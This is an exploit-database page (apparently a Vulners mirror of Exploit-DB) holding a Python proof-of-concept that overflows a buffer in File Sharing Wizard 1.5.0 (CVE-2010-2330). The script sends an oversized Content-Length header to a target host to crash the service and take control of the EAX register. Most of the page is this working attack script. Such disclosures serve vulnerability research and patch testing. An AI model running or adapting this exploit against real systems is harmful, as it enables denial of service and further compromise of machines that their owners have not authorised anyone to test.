Lucene search
+L

File Sharing Wizard 1.5.0 - Buffer Overflow (PoC)

🗓️ 15 Jun 2010 00:00:00Reported by m-1-k-3Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 22 Views

File Sharing Wizard 1.5.0 buffer overflow (PoC

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-2330
15 Jun 201000:00
circl
cve
CVE
CVE-2010-2330
18 Jun 201020:00
cve
cvelist
Cvelist
CVE-2010-2330
18 Jun 201020:00
cvelist
nvd
NVD
CVE-2010-2330
18 Jun 201020:30
nvd
prion
Prion
Stack overflow
18 Jun 201020:30
prion
prion
Prion
Design/Logic Flaw
24 Sep 201921:15
prion
ptsecurity
Positive Technologies
PT-2019-14795 · Upredsun · File Sharing Wizard
24 Sep 201900:00
ptsecurity
redhatcve
RedhatCVE
CVE-2019-16724
22 May 202505:33
redhatcve
#!/usr/bin/python

# http://www.sharing-file.net/
# File Sharing Wizard Version 1.5.0 build on 26-8-2008
#
# controlling EAX
# ESP points to our buffer
# buffer grows if we increase our string
#
# more details on http://www.s3cur1ty.de
# have fun m1k3 [at] m1k3 [dot] at

import socket
import sys

if len(sys.argv) < 2:
print "Usage: vrfy.py <IP-Adr> <port>"
sys.exit(1)

ips = sys.argv[1]
port = int(sys.argv[2])


string = "A"*51
string += "B"*4 #controlling eax
string += "C"*500

header = "Content-Length"

print "starting the attack for:", ips
print ""

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "no connection possible"
sys.exit(1)

print "\r\nsending payload"
print "..."
payload = (
'GET http://%s/ HTTP/1.0\r\n'
'%s: %s\r\n'
'\r\n') % (ips,header,string)

s.send(payload)
s.close()

print "finished kicking device %s" % (ips)
print "... the service should be crashed ... check eax"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jun 2010 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 29.3
EPSS0.27822
22